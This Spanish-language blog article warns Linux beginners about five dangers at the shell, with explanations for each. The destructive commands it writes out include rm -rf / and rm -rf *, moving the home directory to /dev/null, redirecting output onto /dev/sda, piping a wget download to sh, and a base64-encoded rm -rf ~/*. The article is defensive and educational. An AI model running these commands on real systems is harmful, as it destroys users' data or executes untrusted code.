Los comandos de Linux más peligrosos

Precaución: comandos que pueden dañar todo el sistema

La consola de Linux es la interfaz más importante para administrar tu servidor, con el cual puedes realizar cambios en tu sistema. Esto puede ser bastante peligroso, sobre todo para los principiantes ya que, a través de algunos comandos simples, se puede dañar todo el sistema. Te muestro cuáles son los comandos más peligrosos que debes evitar. Están marcados en rojo, así que por favor, ¡no los ejecutes nunca!

consola Linux

Peligro # 1: Borrar archivos importantes accidentalmente – con rm o mv

El primer peligro  tiene que ver con comandos que se usan habitualmente. Si no estás seguro de cómo construir cada comando, puedes dañar rápidamente todo el sistema. En la práctica, los comandos rm (remove = eliminar) y mv (move = mover) llevan a la pérdida de los datos.

El peligro del comando rm:

El comando rm se utiliza para eliminar archivos y directorios, pero puedes borrar todo el sistema si usas parámetros incorrectos. Por ejemplo, configurando el comando de la siguiente manera, eliminarás todos los archivos y carpetas del directorio actual sin confirmación previa:

 rm –rf *

Explicación:

  • rm: remove/eliminar
  • -rf: r = recurrente, incluyendo todos los subdirectorios; f = fuerza; sin confirmación
  • *: marcador de posición para todo en este directorio

El siguiente comando eliminaría incluso todos los documentos y directorios desde el nivel superior “/” de tu sistema:

rm –rf /

 

Cómo funciona el comando mv:

El comando mv es igual de peligroso si no lo usas correctamente, ya que mueve archivos y directorios. Usar parámetros incorrectos, moverá tus archivos a la nada:

mv ~ /dev/null

El símbolo ~ es el directorio de inicio del usuario en el que has iniciado sesión. La ruta “/dev/null” da como resultado un archivo de dispositivo virtual que descarta cualquier archivo. En realidad, se utiliza para redirigir la salida estándar de un programa que no interesa.

Peligro # 2: Uso incorrecto de los operadores

A menudo, los administradores de Linux utilizan los llamados “operadores” para redirigir la salida de un programa. El signo “mayor que” se usa para esto. Por ejemplo, usa el siguiente comando para enrutar el contenido del directorio en el archivo “ListaDirectorios.txt”

ls > ListaDirectorios.txt

Atención:

Si el archivo “ListaDirectorios.txt” ya existe, ¡se sobrescribirá sin preguntar! Si haces doble uso del operador, la salida se añade al archivo existente en lugar de sobrescribirlo:

ls >> ListaDirectorios.txt

Esto puede ocasionar un problema si rediriges la salida a tu disco duro (por ejemplo, /dev/sda). El siguiente comando escribe la salida de “ls” directamente en tu disco principal, sobrescribiendo tus datos.

ls > /dev/sda

Peligro # 3: Descargar contenido peligroso a través de WGET

A los administradores les gusta realizar búsquedas en Internet cuando se encuentran con nuevos problemas. A menudo hay una solución que se puede aplicar de forma inmediata en forma de Shell script, que puedes descargar directamente y ejecutar con la siguiente construcción de comandos:

wget URLmala | sh

 

El comando wget descarga un Shell script desde una URL (en nuestro ejemplo: http://www.URLmala) y lo pasa directamente al Shell (sh) con el Operador Pipe “|”.

Esto es muy peligroso porque probablemente no sepas de qué script se trata.

Descarga Shell scripts pero sin el comando para ejecutarlo directamente. Comprueba el contenido y ejecútalo solo si te parece comprensible.

Peligro # 4: Ejecutar comandos ocultos

Un comando de Linux no siempre es legible a simple vista, por ejemplo, cuando está oculto por codificaciones. Los usuarios malintencionados ocultan comandos peligrosos usando una codificación Base64. Echa un vistazo, por ejemplo, al siguiente comando:

(echo cm0gLXJmIH4vKg== | base64 -d)

Detrás de la cadena cm0gLXJmIH4vKg== se oculta el comando rm –rf ~/*, que borraría todos los archivos y directorios sin confirmación previa. Para ello se decodifica con base64 en el comando anterior y se ejecuta directamente.

¡Nunca ejecutes ningún comando que esté codificado!

 

Decodificador base64
Con un decodificador Base64, puedes ver el contenido de cadenas codificadas.

 

Peligro # 5: Trabajar siempre como usuario root

Muchas de las amenazas anteriormente mencionadas solamente se originan cuando se ejecutan como usuario root. Muy a menudo, incluso para tareas diarias, los administradores con experiencia en Linux trabajan como “root” con todos los privilegios, tan solo por comodidad.

Por lo tanto:

Siempre trabaja con una cuenta de usuario sin privilegios root.

 

Si tienes que ejecutar un comando con derechos de usuario root, usa el comando su para cambiar a la cuenta de usuario root o, dependiendo de la distribución, usa el comando sudo para ejecutar comandos individuales con derechos de usuario root.

 

Imagen de Photo credit: portalgda via Visualhunt / CC BY-NC-SA

Wolf-Dieter Fiege
Wolf-Dieter Fiege ist Senior Specialist für Content Marketing & SEO und leidenschaftlicher Blogger - immer auf der Suche nach interessanten Themen aus der Welt des Webs, Webdesigns und des Online-Business. Als Fachautor und Redakteur ist er in zahlreichen IT-Blogs aktiv. In seiner Freizeit findet man ihn auf einem Fahrrad, joggend, im Schwimmbad, bei Freunden, mit einem guten Buch oder … Mehr über Wolf-Dieter Fiege finden Sie auf XING, LINKEDIN, FACEBOOK und Torial.